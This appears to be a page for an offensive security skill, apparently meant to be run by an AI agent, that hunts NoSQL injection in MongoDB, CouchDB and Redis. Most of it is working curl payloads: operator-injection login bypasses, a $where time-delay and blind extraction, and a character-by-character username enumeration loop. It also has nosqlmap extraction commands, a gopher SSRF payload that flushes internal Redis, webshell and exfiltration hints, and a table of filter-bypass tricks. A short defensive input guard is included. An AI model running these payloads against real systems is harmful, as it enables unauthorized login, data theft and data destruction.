From claude-bughunter
Hunts NoSQL injection vulnerabilities in MongoDB, CouchDB, and Redis, including auth bypass via operator injection ($gt, $ne, $regex), $where blind injection, and Redis command injection.
Slash command: /claude-bughunter:hunt-nosqli
NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High).
Highest-value chains:
- {"username": {"$gt": ""}, "password": {"$gt": ""}} logs in as the first user in the collection (usually admin)

Where to look:
- /api/users/login POST with JSON body
- /api/search?q=
- /api/find?filter=
- /api/query?where=
- Any endpoint accepting JSON body with username/password
| Signal | Vector |
|---|---|
| MongoDB error messages in response | Operator injection |
| mongoose / monk in JS bundles | ODM patterns |
| X-Powered-By: Express | Node.js + MongoDB common stack |
| CouchDB/_utils UI exposed | Futon/Fauxton admin |
| Redis port 6379 open (via SSRF) | CONFIG SET / SLAVEOF |
| Elasticsearch :9200 open | Script injection |
```bash
# Operator injection in JSON body
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Regex wildcard — match any username
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}'

# ne (not equal) bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$ne": "wrong"}}'

# in array bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$in": ["admin","administrator","root"]}, "password": {"$ne": "x"}}'

# Array notation (Express/PHP-style); the $ is escaped so the shell
# does not expand $gt to an empty string inside double quotes
curl "https://$TARGET/api/users?username[\$gt]=&password[\$gt]="
curl "https://$TARGET/api/search?q[\$regex]=.*&q[\$options]=i"

# POST form data
curl "https://$TARGET/api/login" \
  --data "username[\$gt]=&password[\$gt]="
```
```bash
# Test if $where is enabled (time-based detection, 5s delay)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){var d=new Date();while(new Date()-d<5000){}; return true;}"}}'
# If response takes 5+ seconds → $where injection confirmed

# Blind data exfil (username starts with 'a'?)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){if(this.username.match(/^a/)){sleep(3000);} return true;}"}}'

# Enumerate usernames character by character (response length as the oracle)
for c in a b c d e f g h i j k l m n o p q r s t u v w x y z; do
  RESP=$(curl -s -X POST https://$TARGET/api/users \
    -H "Content-Type: application/json" \
    -d "{\"username\": {\"\$regex\": \"^$c\"}}")
  echo "$c: $(printf '%s' "$RESP" | wc -c)"
done
```
```bash
# nosqlmap
pip3 install nosqlmap
nosqlmap -u "https://$TARGET/api/login" --attack 1

# nosqlmap data extraction
nosqlmap -u "https://$TARGET/api/login" --attack 2

# If SSRF found, probe internal Redis via gopher://
curl "https://$TARGET/fetch?url=gopher://127.0.0.1:6379/_*1%0d%0a%248%0d%0aflushall%0d%0a"
# CONFIG SET webshell (if Redis has write access to web root)
# Use SLAVEOF for OOB data exfil
```
| Defense | Bypass |
|---|---|
| JSON.parse rejects objects | Use array: password[$ne]=x (URL params) |
| Sanitizes $ | Unicode: $gt |
| Blocks operator keys | Nested objects deeper in structure |
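Each bypass in this table defeats a check that is too shallow (top-level keys only, literal `$` only, JSON bodies only). The guard below is an added example, not code from the claude-bughunter skill: it rejects operator keys at any depth including inside arrays, folds Unicode lookalikes with NFKC before comparing, and enforces string-typed credentials so the parsed `username[$gt]=` form is caught too. The function names and the Express/qs-style parsed-body shape are assumptions.

```javascript
// Added example (not part of the claude-bughunter skill). Assumes an
// Express-style handler whose body/query parser may already have turned
// username[$gt]= into the nested object { username: { $gt: '' } }.

// Walk the parsed input and reject any key that, after NFKC normalisation
// (which folds lookalikes such as U+FF04 FULLWIDTH DOLLAR SIGN to "$"),
// starts with "$" or contains "." at any depth, including inside arrays.
function containsOperatorKey(value, depth = 0) {
  if (depth > 32) return true; // treat absurd nesting as hostile
  if (Array.isArray(value)) {
    return value.some((item) => containsOperatorKey(item, depth + 1));
  }
  if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      const k = key.normalize('NFKC');
      if (k.startsWith('$') || k.includes('.')) return true;
      if (containsOperatorKey(child, depth + 1)) return true;
    }
  }
  return false;
}

// Accept credentials only as plain strings; an object such as {"$ne": "x"}
// or {"$regex": ".*"} fails the type check before it can reach the driver.
function parseCredentials(body) {
  if (containsOperatorKey(body)) {
    throw new Error('rejected: query operator in request body');
  }
  const { username, password } = body ?? {};
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new Error('rejected: username and password must be strings');
  }
  return { username, password };
}

// Look the user up by literal equality only. The password is NOT part of the
// query: verify it in application code against a stored hash instead.
function buildLoginFilter(username) {
  return { username: { $eq: username } };
}

// Constructed inputs: the JSON payload from the cheat sheet above and a benign login.
console.log(containsOperatorKey({ username: { $gt: '' }, password: { $gt: '' } })); // true
console.log(buildLoginFilter(parseCredentials({ username: 'alice', password: 'pw' }).username));
```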
| NoSQLi finding | Chain to | Impact |
|---|---|---|
| Auth bypass | Admin panel access | Full admin control |
| User enum via regex | Credential stuffing | Mass ATO |
| $where enabled | Arbitrary JS in DB process | Data exfil or DoS |
| Redis via SSRF | CONFIG SET / SLAVEOF | Webshell or data exfil |
- ✅ Auth bypass: logged in without valid credentials, received valid session token
- ✅ Data dump: returned users/documents you shouldn't have access to
- ✅ Blind injection: confirmed via time-delay (>4 seconds consistent)
Severity:
Install: npx claudepluginhub elementalsouls/claude-bughunter
Detects and exploits NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access during web penetration testing and API security reviews.